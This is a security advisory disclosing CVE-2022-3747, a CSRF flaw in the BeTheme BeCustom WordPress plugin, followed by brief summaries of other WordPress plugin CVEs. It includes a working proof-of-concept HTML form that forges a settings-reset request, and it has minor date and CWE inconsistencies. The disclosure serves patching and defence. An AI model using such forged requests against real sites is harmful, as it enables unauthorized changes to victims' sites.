WordPress BeTheme BeCustom plugin versions 1.0.5.2 and below suffer from a cross site request forgery vulnerability.

RCE Security Advisory  
https://www.rcesecurity.com

1. ADVISORY INFORMATION  
=======================  
Product:        BeCustom Wordpress Plugin  
Vendor URL:     https://muffingroup.com/betheme/features/be-custom/  
Type:           Cross-Site Request Forgery [CWE-253]  
Date found:     2021-10-28  
Date published: 2022-11-10  
CVSSv3 Score:   5.7 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N)  
CVE:            CVE-2022-3747

2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.

3. VERSIONS AFFECTED  
====================  
BeTheme BeCustom 1.0.5.2 and below

4. INTRODUCTION  
===============  
Built in-house add-on, perfect for agencies and web developers will let you rebrand  
Be & WordPresss Admin to your own product by replacing all the Be & Muffin logos with  
own.

This tool is supplied exclusively to the customers of Betheme and allows for changes  
like: complete dashboard customization, replacement of logos, colors managment and much  
more. With just a few clicks, you will turn the Be & Muffin brand into yours, thanks to  
which you will increase the trust of your customers.

Moreover, from now on you can also customize the WPLogin page.

(from the vendor's homepage)

5. VULNERABILITY DETAILS  
========================  
The WordPress plugin lacks an anti-CSRF protection on all of its functionalities, which  
ultimately allows an attacker to (amongst others):

- Set custom brandings  
- Enable/Disable BeCustom features  
- Modify the WP Login view  
- Modify the BeDashboard texts

Since there is no anti-CSRF token protecting these functionalities, they are  
vulnerable to Cross-Site Request Forgery attacks allowing an attacker to perform  
a variety of attacks as mentioned above.

To successfully exploit this vulnerability, a user with the right to access the  
plugin must be tricked into visiting an arbitrary website while having an authenticated  
session in the application.

6. PROOF OF CONCEPT  
===================  
An exemplary exploit to reset the plugin's configuration:

<html>  
  <body>  
    <form action="http://localhost/wp-admin/admin.php?page=be_custom_branding" method="POST">  
      <input type="hidden" name="betheme_label" value="" />  
      <input type="hidden" name="betheme_url_slug" value="" />  
      <input type="hidden" name="replaced_logo_url" value="" />  
      <input type="hidden" name="replaced_theme_image" value="" />  
      <input type="hidden" name="replaced_theme_desc" value="" />  
      <input type="hidden" name="replaced_theme_author" value="Muffin Group 1337" />  
      <input type="hidden" name="submit" value="Save changes" />  
      <input type="submit" value="Submit request" />  
    </form>  
  </body>  
</html>

7. SOLUTION  
===========  
Update to BeCustom 1.0.5.3

8. REPORT TIMELINE  
==================  
2022-10-28: Discovery of the vulnerability  
2022-10-28: CVE requested from Wordfence (CNA)  
2022-10-28: Wordfence assigns CVE-2022-3747  
2022-11-01: Vendor notification  
2022-11-07: No response. Sent another notification.  
2022-11-08: Opened up a security support case on envato.com  
2022-11-xx: Vendor publishes version 1.0.5.3 without notification which fixes this issue  
2022-11-10: Public disclosure

9. REFERENCES  
=============  
https://github.com/MrTuxracer/advisories

WordPress BeTheme BeCustom 1.0.5.2 Cross Site Request Forgery

The "Follow Me Plugin" plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.1.1. This is due to missing nonce validation on the FollowMeIgniteSocialMedia_options_page() function. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVE-2022-3240: follow-me.php in follow-me/trunk – WordPress Plugin Repository

The reSmush.it : the only free Image Optimizer & compress plugin WordPress plugin before 0.4.4 does not perform CSRF checks for any of its AJAX actions, allowing an attackers to trick logged in users to perform various actions on their behalf on the site.

CVE-2022-2449

The reSmush.it : the only free Image Optimizer & compress plugin WordPress plugin before 0.4.4 lacks authorization in various AJAX actions, allowing any logged-in users, such as subscribers to call them.

CVE-2022-2450

The Chat Bubble WordPress plugin before 2.3 does not sanitise and escape some contact parameters, which could allow unauthenticated attackers to set Stored Cross-Site Scripting payloads in them, which will trigger when an admin view the related contact message

CVE-2022-3415

The WP Attachments WordPress plugin before 5.0.5 does not sanitize and escapes some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in multisite setup).

CVE-2022-3469

The tagDiv Composer WordPress plugin before 3.5, required by the Newspaper WordPress theme before 12.1 and Newsmag WordPress theme before 5.2.2, does not properly implement the Facebook login feature, allowing unauthenticated attackers to login as any user by just knowing their email address

CVE-2022-3477

The WPB Show Core WordPress plugin through TODO does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting

CVE-2022-3484

The Webmaster Tools Verification WordPress plugin through 1.2 does not have authorisation and CSRF checks when disabling plugins, allowing unauthenticated users to disable arbitrary plugins

CVE-2022-3538

The Testimonials WordPress plugin before 2.7, super-testimonial-pro WordPress plugin before 1.0.8 do not sanitize and escape its settings, allowing high privilege users such as admin to perform cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

Tag

#wordpress